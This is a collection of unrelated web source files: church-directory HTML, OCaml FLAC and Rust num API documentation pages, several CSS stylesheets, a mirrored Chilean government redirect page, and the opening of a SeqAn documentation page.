<p><b><font size="-1" color="#ff0000">Horario de cultos:</font></b></p>
<p><b><font size="-1" color="#333333">Escuela dominical: 3:00pm<br>
Domingo AM: 3:00pm<br>
Domingo PM: 3:00pm-5:00pm<br>
Lunes: none<br>
Martes: 7:30pm<br>
Miércoles: none<br>
Jueves: 7:30pm<br>
Viernes: celulas<br>
Sábado: none<br>
</font></b></p>
</div>
</td>
</tr>
</table>
<b><a href="http://iglesia-usa.com/iglesia-arizona.html">Volver a iglesia Arizona</a></b>Publiciaciones Visión de Gracia presenta el directorio y guia cristiana iglesia-usa.com con lista de las iglesias en USA EU.</div>
</BODY>
</HTML>
|
website/orig/legacy/modules/ocaml-flac/Flac.Encoder.File.html | savonet/liquidsoap-full | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="style.css" type="text/css">
<meta content="text/html; charset=iso-8859-1" http-equiv="Content-Type">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="Start" href="index.html">
<link rel="Up" href="Flac.Encoder.html">
<link title="Index of types" rel=Appendix href="index_types.html">
<link title="Index of exceptions" rel=Appendix href="index_exceptions.html">
<link title="Index of values" rel=Appendix href="index_values.html">
<link title="Index of modules" rel=Appendix href="index_modules.html">
<link title="Flac" rel="Chapter" href="Flac.html">
<link title="Ogg_demuxer_flac_decoder" rel="Chapter" href="Ogg_demuxer_flac_decoder.html">
<link title="Ogg_flac" rel="Chapter" href="Ogg_flac.html"><link title="Types" rel="Section" href="#3_Types">
<link title="Functions" rel="Section" href="#3_Functions">
<title>Flac.Encoder.File</title>
</head>
<body>
<div class="navbar"> <a class="up" href="Flac.Encoder.html" title="Flac.Encoder">Up</a>
</div>
<h1>Module <a href="type_Flac.Encoder.File.html">Flac.Encoder.File</a></h1>
<pre><span id="MODULEFile"><span class="keyword">module</span> File</span>: <code class="code">sig</code> <a href="Flac.Encoder.File.html">..</a> <code class="code">end</code></pre><div class="info module top">
<div class="info-desc">
<p>Encode to a local file</p>
</div>
</div>
<hr width="100%">
<p>Convenience module to encode to a local native FLAC file.</p>
<h4 id="3_Types">Types</h4>
<pre><span id="TYPEfile"><span class="keyword">type</span> <code class="type"></code>file</span> </pre>
<div class="info ">
<div class="info-desc">
<p>Generic variant type for file encoder</p>
</div>
</div>
<pre><code><span id="TYPEhandle"><span class="keyword">type</span> <code class="type"></code>handle</span> = {</code></pre><table class="typetable">
<tr>
<td align="left" valign="top" >
<code> </code></td>
<td align="left" valign="top" >
<code><span id="TYPEELThandle.fd">fd</span> : <code class="type">Unix.file_descr</code>;</code></td>
</tr>
<tr>
<td align="left" valign="top" >
<code> </code></td>
<td align="left" valign="top" >
<code><span id="TYPEELThandle.enc">enc</span> : <code class="type"><a href="Flac.Encoder.File.html#TYPEfile">file</a> <a href="Flac.Encoder.html#TYPEt">Flac.Encoder.t</a></code>;</code></td>
</tr>
<tr>
<td align="left" valign="top" >
<code> </code></td>
<td align="left" valign="top" >
<code><span id="TYPEELThandle.callbacks">callbacks</span> : <code class="type"><a href="Flac.Encoder.File.html#TYPEfile">file</a> <a href="Flac.Encoder.html#TYPEcallbacks">Flac.Encoder.callbacks</a></code>;</code></td>
</tr></table>
}
<div class="info ">
<div class="info-desc">
<p>Handle for file encoder</p>
</div>
</div>
<h4 id="3_Functions">Functions</h4>
<pre><span id="VALcreate_from_fd"><span class="keyword">val</span> create_from_fd</span> : <code class="type">?comments:<a href="Flac.Encoder.html#TYPEcomments">Flac.Encoder.comments</a> -><br> <a href="Flac.Encoder.html#TYPEparams">Flac.Encoder.params</a> -> Unix.file_descr -> <a href="Flac.Encoder.File.html#TYPEhandle">handle</a></code></pre><div class="info ">
<div class="info-desc">
<p>Create a file encoder writing data to a given Unix file descriptor.</p>
<p>Note: this encoder requires seeking thus will only work on seekable
file descriptor.</p>
</div>
</div>
<pre><span id="VALcreate"><span class="keyword">val</span> create</span> : <code class="type">?comments:<a href="Flac.Encoder.html#TYPEcomments">Flac.Encoder.comments</a> -><br> <a href="Flac.Encoder.html#TYPEparams">Flac.Encoder.params</a> -> string -> <a href="Flac.Encoder.File.html#TYPEhandle">handle</a></code></pre><div class="info ">
<div class="info-desc">
<p>Create a file encoder writing data to the given file URI</p>
</div>
</div>
</body></html>
|
css/grain.css | braddoro/grain_bank | <style type="text/css">
body {
display: block;
margin: .8em;
background-color: #F5F5F5;
}
table {
display: table;
border-collapse: separate;
border-spacing: .0em;
font-family: arial;
font-size: .9em;
background-color: #FFFFF0
}
tbody {
display: table-row-group;
vertical-align: middle;
border-color: inherit;
background-color: #FFFFF0
}
thead {
display: table-header-group;
vertical-align: middle;;
background-color: #DCDCDC;
text-align: left;
}
tfoot {
display: table-footer-group;
vertical-align: middle;
border-color: inherit;
background-color: #DCDCDC;
text-align: left;
}
th {
display: table-cell;
vertical-align: inherit;
font-weight: bold;
padding-right: 1em;
}
tr {
display: table-row;
vertical-align: inherit;
border-color: inherit;
}
.tr-odd {
display: table-row;
vertical-align: inherit;
border-color: inherit;
background-color: #FFFFD1;
}
.tr-eve {
display: table-row;
vertical-align: inherit;
border-color: inherit;
background-color: #D7C9B0;
}
td {
display: table-cell;
vertical-align: inherit;
padding-right: 1em;
}
tdl {
display: table-cell;
vertical-align: inherit;
}
.tdr {
display: table-cell;
vertical-align: inherit;
text-align: right;
padding-right: 1em;
}
span {
font-family: arial, Sans-serif;
font-size: 1.1em;
font-weight: bold;
background-color: #DCDCDC;
color: #000000;
padding-left: .5em;
padding-right: .5em;
}
.spanl {
font-family: arial, Sans-serif;
font-size: 1.1em;
font-weight: bold;
background-color: #DCDCDC;
color: #000000;
padding-left: .5em;
padding-right: .5em;
text-align: left;
}
div1 {
font-family: arial, Sans-serif;
font-size: 1.1em;
font-weight: bold;
background-color: #DCDCDC;
color: #000000;
padding-left: .5em;
padding-right: .5em;
}
div.form {
font-family: arial, Sans-serif;
font-size: .9em;
font-weight: normal;
background-color: #DCDCDC;
color: #000000;
padding: .5em;
width: 33%;
}
</style>
|
guiaweb_old/scripts/enviaMailRecomienda.html | e-gob/GuiaDigital | <html>
<!-- Mirrored from www.guiaweb.gob.cl/scripts/enviaMailRecomienda.php by HTTrack Website Copier/3.x [XR&CO'2010], Tue, 29 Nov 2011 22:17:45 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8"><!-- /Added by HTTrack -->
<head>
<script language="javascript" type="text/javascript">
function redir(){
document.frm.action = "../recomendar.html";
document.frm.submit();
return;
}
</script>
</head>
<body onload="redir();">
<form name="frm" method="post">
<input type="hidden" name="envia" value="1"/>
<input type="hidden" name="nomCom" value=""/>
<input type="hidden" name="nomDes" value=""/>
</form>
</body>
<!-- Mirrored from www.guiaweb.gob.cl/scripts/enviaMailRecomienda.php by HTTrack Website Copier/3.x [XR&CO'2010], Tue, 29 Nov 2011 22:17:45 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8"><!-- /Added by HTTrack -->
</html>
<script type='text/javascript' src="/guiaweb_old/mensaje_caducidad.js"></script> |
docs/doc/num/traits/trait.Signed.html | TheZoq2/Rust-Scad | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `Signed` trait in crate `num`.">
<meta name="keywords" content="rust, rustlang, rust-lang, Signed">
<title>num::traits::Signed - Rust</title>
<link rel="stylesheet" type="text/css" href="../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../main.css">
<link rel="shortcut icon" href="http://rust-num.github.io/num/favicon.ico">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<nav class="sidebar">
<a href='../../num/index.html'><img src='http://rust-num.github.io/num/rust-logo-128x128-blk-v2.png' alt='logo' width='100'></a>
<p class='location'><a href='../index.html'>num</a>::<wbr><a href='index.html'>traits</a></p><script>window.sidebarCurrent = {name: 'Signed', ty: 'trait', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content trait">
<h1 class='fqn'><span class='in-band'>Trait <a href='../index.html'>num</a>::<wbr><a href='index.html'>traits</a>::<wbr><a class='trait' href=''>Signed</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-97' class='srclink' href='../../num_traits/sign/trait.Signed.html?gotosrc=97' title='goto source code'>[src]</a></span></h1>
<pre class='rust trait'>pub trait Signed: <a class='trait' href='../../num/traits/trait.Num.html' title='num::traits::Num'>Num</a> + <a class='trait' href='https://doc.rust-lang.org/nightly/core/ops/trait.Neg.html' title='core::ops::Neg'>Neg</a><Output=Self> {
fn <a href='#tymethod.abs' class='fnname'>abs</a>(&self) -> Self;
fn <a href='#tymethod.abs_sub' class='fnname'>abs_sub</a>(&self, other: &Self) -> Self;
fn <a href='#tymethod.signum' class='fnname'>signum</a>(&self) -> Self;
fn <a href='#tymethod.is_positive' class='fnname'>is_positive</a>(&self) -> <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.bool.html'>bool</a>;
fn <a href='#tymethod.is_negative' class='fnname'>is_negative</a>(&self) -> <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.bool.html'>bool</a>;
}</pre><div class='docblock'><p>Useful functions for signed numbers (i.e. numbers that can be negative).</p>
</div>
<h2 id='required-methods'>Required Methods</h2>
<div class='methods'>
<h3 id='tymethod.abs' class='method stab '><span id='abs.v' class='invisible'><code>fn <a href='#tymethod.abs' class='fnname'>abs</a>(&self) -> Self</code></span></h3><div class='docblock'><p>Computes the absolute value.</p>
<p>For <code>f32</code> and <code>f64</code>, <code>NaN</code> will be returned if the number is <code>NaN</code>.</p>
<p>For signed integers, <code>::MIN</code> will be returned if the number is <code>::MIN</code>.</p>
</div><h3 id='tymethod.abs_sub' class='method stab '><span id='abs_sub.v' class='invisible'><code>fn <a href='#tymethod.abs_sub' class='fnname'>abs_sub</a>(&self, other: &Self) -> Self</code></span></h3><div class='docblock'><p>The positive difference of two numbers.</p>
<p>Returns <code>zero</code> if the number is less than or equal to <code>other</code>, otherwise the difference
between <code>self</code> and <code>other</code> is returned.</p>
</div><h3 id='tymethod.signum' class='method stab '><span id='signum.v' class='invisible'><code>fn <a href='#tymethod.signum' class='fnname'>signum</a>(&self) -> Self</code></span></h3><div class='docblock'><p>Returns the sign of the number.</p>
<p>For <code>f32</code> and <code>f64</code>:</p>
<ul>
<li><code>1.0</code> if the number is positive, <code>+0.0</code> or <code>INFINITY</code></li>
<li><code>-1.0</code> if the number is negative, <code>-0.0</code> or <code>NEG_INFINITY</code></li>
<li><code>NaN</code> if the number is <code>NaN</code></li>
</ul>
<p>For signed integers:</p>
<ul>
<li><code>0</code> if the number is zero</li>
<li><code>1</code> if the number is positive</li>
<li><code>-1</code> if the number is negative</li>
</ul>
</div><h3 id='tymethod.is_positive' class='method stab '><span id='is_positive.v' class='invisible'><code>fn <a href='#tymethod.is_positive' class='fnname'>is_positive</a>(&self) -> <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.bool.html'>bool</a></code></span></h3><div class='docblock'><p>Returns true if the number is positive and false if the number is zero or negative.</p>
</div><h3 id='tymethod.is_negative' class='method stab '><span id='is_negative.v' class='invisible'><code>fn <a href='#tymethod.is_negative' class='fnname'>is_negative</a>(&self) -> <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.bool.html'>bool</a></code></span></h3><div class='docblock'><p>Returns true if the number is negative and false if the number is zero or positive.</p>
</div></div>
<h2 id='implementors'>Implementors</h2>
<ul class='item-list' id='implementors-list'>
<li><code>impl<T> Signed for <a class='struct' href='../../num/rational/struct.Ratio.html' title='num::rational::Ratio'>Ratio</a><T> <span class='where'>where T: <a class='trait' href='https://doc.rust-lang.org/nightly/core/clone/trait.Clone.html' title='core::clone::Clone'>Clone</a> + <a class='trait' href='../../num/integer/trait.Integer.html' title='num::integer::Integer'>Integer</a> + <a class='trait' href='../../num/traits/trait.Signed.html' title='num::traits::Signed'>Signed</a></span></code></li>
<li><code>impl Signed for <a class='struct' href='../../num/bigint/struct.BigInt.html' title='num::bigint::BigInt'>BigInt</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.isize.html'>isize</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.i8.html'>i8</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.i16.html'>i16</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.i32.html'>i32</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.i64.html'>i64</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.f32.html'>f32</a></code></li>
<li><code>impl Signed for <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.f64.html'>f64</a></code></li>
</ul><script type="text/javascript" async
src="../../implementors/num_traits/sign/trait.Signed.js">
</script></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../";
window.currentCrate = "num";
window.playgroundUrl = "http://play.rust-lang.org/";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script src="../../playpen.js"></script>
<script defer src="../../search-index.js"></script>
</body>
</html> |
wp-content/themes/sonnetwp/style.css | davidtromero/net-iq | /*
Theme Name: Sonnet
Theme URI: http://sonnetwp.themebucket.net/
Author: ThemeBucket
Author URI: http://themeforest.net/user/ThemeBucket/portfolio/
Description: Description
Version: 1.3
License: GNU General Public License
Text Domain: sonnet
Domain Path: /languages/
Tags:
This theme, like WordPress, is licensed under the GPL.
Use it to make something cool, have fun, and share what you've learned with others.
Sonnet is based on Underscores http://underscores.me/, (C) 2012-2013 Automattic, Inc.
Resetting and rebuilding styles have been helped along thanks to the fine work of
Eric Meyer http://meyerweb.com/eric/tools/css/reset/index.html
along with Nicolas Gallagher and Jonathan Neal http://necolas.github.com/normalize.css/
and Blueprint http://www.blueprintcss.org/
*/
/* =Reset
-------------------------------------------------------------- */
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, font, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td {
border: 0;
font-family: inherit;
font-size: 100%;
font-style: inherit;
font-weight: inherit;
margin: 0;
outline: 0;
padding: 0;
vertical-align: baseline;
}
html {
font-size: 62.5%; /* Corrects text resizing oddly in IE6/7 when body font-size is set using em units http://clagnut.com/blog/348/#c790 */
overflow-y: scroll; /* Keeps page centred in all browsers regardless of content height */
-webkit-text-size-adjust: 100%; /* Prevents iOS text size adjust after orientation change, without disabling user zoom */
-ms-text-size-adjust: 100%; /* www.456bereastreet.com/archive/201012/controlling_text_size_in_safari_for_ios_without_disabling_user_zoom/ */
}
body {
background: #fff;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
main,
nav,
section {
display: block;
}
ol, ul {
list-style: none;
}
table { /* tables still need 'cellspacing="0"' in the markup */
border-collapse: separate;
border-spacing: 0;
}
caption, th, td {
font-weight: normal;
text-align: left;
}
blockquote:before, blockquote:after,
q:before, q:after {
content: "";
}
blockquote, q {
quotes: "" "";
}
a:focus {
outline: thin dotted;
}
a:hover,
a:active { /* Improves readability when focused and also mouse hovered in all browsers people.opera.com/patrickl/experiments/keyboard/test */
outline: 0;
}
a img {
border: 0;
}
/* =Global
----------------------------------------------- */
body,
button,
input,
select,
textarea {
color: #404040;
font-family: "Open Sans",sans-serif;
font-size: 16px;
font-size: 1.6rem;
line-height: 1.5;
}
/* Headings */
h1, h2, h3, h4, h5, h6 {
clear: both;
}
hr {
background-color: #ccc;
border: 0;
height: 1px;
margin-bottom: 1.5em;
}
/* Text elements */
p {
margin-bottom: 1.5em;
}
ul, ol {
margin: 0 0 1.5em 3em;
}
ul {
list-style: disc;
}
ol {
list-style: decimal;
}
li > ul,
li > ol {
margin-bottom: 0;
margin-left: 1.5em;
}
dt {
font-weight: bold;
}
dd {
margin: 0 1.5em 1.5em;
}
b, strong {
font-weight: bold;
}
dfn, cite, em, i {
font-style: italic;
}
blockquote {
margin: 0 1.5em;
}
address {
margin: 0 0 1.5em;
}
pre {
background: #eee;
font-family: "Courier 10 Pitch", Courier, monospace;
font-size: 15px;
font-size: 1.5rem;
line-height: 1.6;
margin-bottom: 1.6em;
max-width: 100%;
overflow: auto;
padding: 1.6em;
}
code, kbd, tt, var {
font: 15px Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
}
abbr, acronym {
border-bottom: 1px dotted #666;
cursor: help;
}
mark, ins {
background: #fff9c0;
text-decoration: none;
}
sup,
sub {
font-size: 75%;
height: 0;
line-height: 0;
position: relative;
vertical-align: baseline;
}
sup {
bottom: 1ex;
}
sub {
top: .5ex;
}
small {
font-size: 75%;
}
big {
font-size: 125%;
}
figure {
margin: 0;
}
table {
margin: 0 0 1.5em;
width: 100%;
}
th {
font-weight: bold;
}
img {
height: auto; /* Make sure images are scaled correctly. */
max-width: 100%; /* Adhere to container width. */
}
button,
input,
select,
textarea {
font-size: 100%; /* Corrects font size not being inherited in all browsers */
margin: 0; /* Addresses margins set differently in IE6/7, F3/4, S5, Chrome */
vertical-align: baseline; /* Improves appearance and consistency in all browsers */
*vertical-align: middle; /* Improves appearance and consistency in all browsers */
}
button,
input {
line-height: normal; /* Addresses FF3/4 setting line-height using !important in the UA stylesheet */
}
/*button,*/
/*html input[type="button"],*/
/*input[type="reset"],*/
/*input[type="submit"] {*/
/*border: 1px solid #ccc;*/
/*border-color: #ccc #ccc #bbb #ccc;*/
/*border-radius: 3px;*/
/*background: #e6e6e6;*/
/*box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.5), inset 0 15px 17px rgba(255, 255, 255, 0.5), inset 0 -5px 12px rgba(0, 0, 0, 0.05);*/
/*color: rgba(0, 0, 0, .8);*/
/*cursor: pointer; *//* Improves usability and consistency of cursor style between image-type 'input' and others */
/*-webkit-appearance: button; *//* Corrects inability to style clickable 'input' types in iOS */
/*font-size: 12px;*/
/*font-size: 1.2rem;*/
/*line-height: 1;*/
/*padding: .6em 1em .4em;*/
/*text-shadow: 0 1px 0 rgba(255, 255, 255, 0.8);*/
/*}*/
/*button:hover,*/
/*html input[type="button"]:hover,*/
/*input[type="reset"]:hover,*/
/*input[type="submit"]:hover {*/
/*border-color: #ccc #bbb #aaa #bbb;*/
/*box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.8), inset 0 15px 17px rgba(255, 255, 255, 0.8), inset 0 -5px 12px rgba(0, 0, 0, 0.02);*/
/*}*/
/*button:focus,*/
/*html input[type="button"]:focus,*/
/*input[type="reset"]:focus,*/
/*input[type="submit"]:focus,*/
/*button:active,*/
/*html input[type="button"]:active,*/
/*input[type="reset"]:active,*/
/*input[type="submit"]:active {*/
/*border-color: #aaa #bbb #bbb #bbb;*/
/*box-shadow: inset 0 -1px 0 rgba(255, 255, 255, 0.5), inset 0 2px 5px rgba(0, 0, 0, 0.15);*/
/*}*/
/*input[type="checkbox"],*/
/*input[type="radio"] {*/
/*box-sizing: border-box; *//* Addresses box sizing set to content-box in IE8/9 */
/*padding: 0; *//* Addresses excess padding in IE8/9 */
/*}*/
/*input[type="search"] {*/
/*-webkit-appearance: textfield; *//* Addresses appearance set to searchfield in S5, Chrome */
/*-webkit-box-sizing: content-box; *//* Addresses box sizing set to border-box in S5, Chrome (include -moz to future-proof) */
/*-moz-box-sizing: content-box;*/
/*box-sizing: content-box;*/
/*}*/
/*input[type="search"]::-webkit-search-decoration { *//* Corrects inner padding displayed oddly in S5, Chrome on OSX */
/*-webkit-appearance: none;*/
/*}*/
/*button::-moz-focus-inner,*/
/*input::-moz-focus-inner { *//* Corrects inner padding and border displayed oddly in FF3/4 www.sitepen.com/blog/2008/05/14/the-devils-in-the-details-fixing-dojos-toolbar-buttons/ */
/*border: 0;*/
/*padding: 0;*/
/*}*/
/*input[type="text"],*/
/*input[type="email"],*/
/*input[type="url"],*/
/*input[type="password"],*/
/*input[type="search"],*/
/*textarea {*/
/*color: #666;*/
/*border: 1px solid #ccc;*/
/*border-radius: 3px;*/
/*}*/
/*input[type="text"]:focus,*/
/*input[type="email"]:focus,*/
/*input[type="url"]:focus,*/
/*input[type="password"]:focus,*/
/*input[type="search"]:focus,*/
/*textarea:focus {*/
/*color: #111;*/
/*}*/
/*input[type="text"],*/
/*input[type="email"],*/
/*input[type="url"],*/
/*input[type="password"],*/
/*input[type="search"] {*/
/*padding: 3px;*/
/*}*/
/*textarea {*/
/*overflow: auto; *//* Removes default vertical scrollbar in IE6/7/8/9 */
/*padding-left: 3px;*/
/*vertical-align: top; *//* Improves readability and alignment in all browsers */
/*width: 98%;*/
/*}*/
/* Links */
a {
color: royalblue;
}
a:visited {
color: purple;
}
a:hover,
a:focus,
a:active {
color: midnightblue;
}
/* Alignment */
.alignleft {
display: inline;
float: left;
margin-right: 1.5em;
}
.alignright {
display: inline;
float: right;
margin-left: 1.5em;
}
.aligncenter {
clear: both;
display: block;
margin: 0 auto;
}
/* Text meant only for screen readers */
.screen-reader-text {
clip: rect(1px, 1px, 1px, 1px);
position: absolute !important;
}
.screen-reader-text:hover,
.screen-reader-text:active,
.screen-reader-text:focus {
background-color: #f1f1f1;
border-radius: 3px;
box-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6);
clip: auto !important;
color: #21759b;
display: block;
font-size: 14px;
font-weight: bold;
height: auto;
left: 5px;
line-height: normal;
padding: 15px 23px 14px;
text-decoration: none;
top: 5px;
width: auto;
z-index: 100000; /* Above WP toolbar */
}
/* Clearing */
.clear:before,
.clear:after,
.entry-content:before,
.entry-content:after,
.comment-content:before,
.comment-content:after,
.site-header:before,
.site-header:after,
.site-content:before,
.site-content:after,
.site-footer:before,
.site-footer:after {
content: '';
display: table;
}
.clear:after,
.entry-content:after,
.comment-content:after,
.site-header:after,
.site-content:after,
.site-footer:after {
clear: both;
}
/* =Menu
----------------------------------------------- */
.main-navigation {
clear: both;
display: block;
float: left;
width: 100%;
}
.main-navigation ul {
list-style: none;
margin: 0;
padding-left: 0;
}
.main-navigation li {
float: left;
position: relative;
}
.main-navigation a {
display: block;
text-decoration: none;
}
.main-navigation ul ul {
box-shadow: 0 3px 3px rgba(0, 0, 0, 0.2);
display: none;
float: left;
left: 0;
position: absolute;
top: 1.5em;
z-index: 99999;
}
.main-navigation ul ul ul {
left: 100%;
top: 0;
}
.main-navigation ul ul a {
width: 200px;
}
.main-navigation ul ul li {
}
.main-navigation li:hover > a {
}
.main-navigation ul ul :hover > a {
}
.main-navigation ul ul a:hover {
}
.main-navigation ul li:hover > ul {
display: block;
}
.main-navigation li.current_page_item a,
.main-navigation li.current-menu-item a {
}
/* Small menu */
.menu-toggle {
cursor: pointer;
display: none;
}
@media screen and (max-width: 600px) {
.menu-toggle,
.main-navigation.toggled .nav-menu {
display: block;
}
.main-navigation ul {
display: none;
}
}
/* =Content
----------------------------------------------- */
.sticky {
}
.hentry {
margin: 0 0 1.5em;
}
.byline,
.updated {
display: none;
}
.single .byline,
.group-blog .byline {
display: inline;
}
.page-content,
.entry-content,
.entry-summary {
margin: 1.5em 0 0;
}
.page-links {
clear: both;
margin: 0 0 1.5em;
}
/* =Asides
----------------------------------------------- */
.blog .format-aside .entry-title,
.archive .format-aside .entry-title {
display: none;
}
/* =Media
----------------------------------------------- */
.page-content img.wp-smiley,
.entry-content img.wp-smiley,
.comment-content img.wp-smiley {
border: none;
margin-bottom: 0;
margin-top: 0;
padding: 0;
}
.wp-caption {
border: 1px solid #ccc;
margin-bottom: 1.5em;
max-width: 100%;
}
.wp-caption img[class*="wp-image-"] {
display: block;
margin: 1.2% auto 0;
max-width: 98%;
}
.wp-caption-text {
text-align: center;
}
.wp-caption .wp-caption-text {
margin: 0.8075em 0;
}
.site-main .gallery {
margin-bottom: 1.5em;
}
.gallery-caption {
}
.site-main .gallery a img {
border: none;
height: auto;
max-width: 90%;
}
.site-main .gallery dd {
margin: 0;
}
.site-main .gallery-columns-4 .gallery-item {
}
.site-main .gallery-columns-4 .gallery-item img {
}
/* Make sure embeds and iframes fit their containers */
embed,
iframe,
object {
max-width: 100%;
}
/* =Navigation
----------------------------------------------- */
.site-main [class*="navigation"] {
margin: 0 0 1.5em;
overflow: hidden;
}
[class*="navigation"] .nav-previous {
float: left;
width: 50%;
}
[class*="navigation"] .nav-next {
float: right;
text-align: right;
width: 50%;
}
/* =Comments
----------------------------------------------- */
.comment-content a {
word-wrap: break-word;
}
.bypostauthor {
}
/* =Widgets
----------------------------------------------- */
.widget {
margin: 0 0 1.5em;
}
/* Make sure select elements fit in widgets */
.widget select {
max-width: 100%;
}
/* Search widget */
.widget_search .search-submit {
display: none;
}
/* =Infinite Scroll
----------------------------------------------- */
/* Globally hidden elements when Infinite Scroll is supported and in use. */
.infinite-scroll .paging-navigation, /* Older / Newer Posts Navigation (always hidden) */
.infinite-scroll.neverending .site-footer { /* Theme Footer (when set to scrolling) */
display: none;
}
/* When Infinite Scroll has reached its end we need to re-display elements that were hidden (via .neverending) before */
.infinity-end.neverending .site-footer {
display: block;
}
|
templates/gds/js/jscrollpane/jquery.jscrollpane.lozenge.css | chalosalvador/GDS |
.jspHorizontalBar,
.jspVerticalBar,
.jspTrack
{
background: #eeeef4;
}
.jspDrag
{
background: #bbd;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
border-radius: 10px;
}
.jspTrack .jspActive,
.jspTrack .jspHover,
.jspDrag:hover
{
background: #8B8B9F;
}
.jspArrow
{
background: url(image/ui-icons_222222_256x240.png) no-repeat;
-moz-border-radius: 10px;
-webkit-border-radius: 10px;
border-radius: 10px;
}
.jspVerticalBar>.jspActive,
.jspArrow:hover
{
background-image: url('image/ui-icons_cd0a0a_256x240.png');
}
.jspVerticalBar>.jspDisabled,
.jspVerticalBar>.jspDisabled:hover,
.jspHorizontalBar>.jspDisabled,
.jspHorizontalBar>.jspDisabled:hover
{
background-color: transparent;
background-image: url('image/ui-icons_888888_256x240.png');
}
.jspVerticalBar .jspArrow
{
height: 15px;
}
.jspHorizontalBar .jspArrow
{
width: 15px;
}
.jspArrowUp
{
background-position: 0 0;
}
.jspArrowDown
{
background-position: -64px 0 !important;
}
.jspArrowLeft
{
background-position: -96px 0 !important;
}
.jspArrowRight
{
background-position: -32px 0 !important;
} |
deps/seqan-library-2.0.0/share/doc/seqan/html/class_BamHeader.html | fmaguire/KAT | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="class_bamheader" data-page="BamHeader">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>BamHeader - SeqAn API Documentation</title>
<script type="text/javascript" charset="utf-8" src="js/jquery.js"></script>
<link rel="stylesheet" href="lib/bootstrap/css/bootstrap.css" type="text/css" media="screen" charset="utf-8" />
<script type="text/javascript" charset="utf-8" src="lib/bootstrap/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="lib/bootstrap-multiselect/css/bootstrap-multiselect.css" type="text/css" media="screen" charset="utf-8" />
<script type="text/javascript" charset="utf-8" src="lib/bootstrap-multiselect/js/bootstrap-multiselect.js"></script>
<script type="text/javascript" charset="utf-8" src="lib/ZeroClipboard/ZeroClipboard.min.js"></script>
<link rel="stylesheet" href="css/style.css" type="text/css" media="screen" charset="utf-8" />
<link rel="stylesheet" href="css/common.less.css" type="text/css" media="screen" charset="utf-8" />
<script type="text/javascript" charset="utf-8" src="js/less.min.js"></script>
<script type="text/javascript" charset="utf-8">
hasFrames = window.top.frames.main ? true : false;
relpath = '/';
docsPrefix = 'docs/yard';
listPrefix = 'list/docs/yard';
searchPrefix = 'search/docs/yard';
framesUrl = '/docs/yard/frames/file/README.md';
</script>
<style type="text/css">
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #408080; font-style: italic } /* Comment */
